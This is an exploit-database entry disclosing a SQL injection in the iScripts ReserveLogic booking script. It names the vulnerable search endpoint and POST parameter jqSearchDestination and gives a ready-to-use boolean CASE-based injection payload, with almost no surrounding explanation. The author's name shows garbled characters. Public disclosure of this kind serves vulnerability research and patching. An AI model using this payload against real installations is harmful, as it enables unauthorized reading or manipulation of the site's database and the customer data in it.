iScripts ReserveLogic - SQL Injection



EKU-ID: 50667 CVE: OSVDB-ID:
Author: Ahmet 躮it BAYRAM Published: 2019-04-03 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 


# Exploit Title: iScripts ReserveLogic - SQL Injection
# Date: 29.03.2019
# Exploit Author: Ahmet 躮it BAYRAM
# Vendor Homepage: https://www.iscripts.com/reservelogic/
# Demo Site: https://www.demo.iscripts.com/reservelogic/demo/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

Request: http://localhost/[PATH]/search
Vulnerable Parameter: jqSearchDestination (POST)
Payload: jqSearchDestination=(SELECT (CASE WHEN (8124=8124) THEN 12345 ELSE
(SELECT 3029 UNION SELECT 1241) END))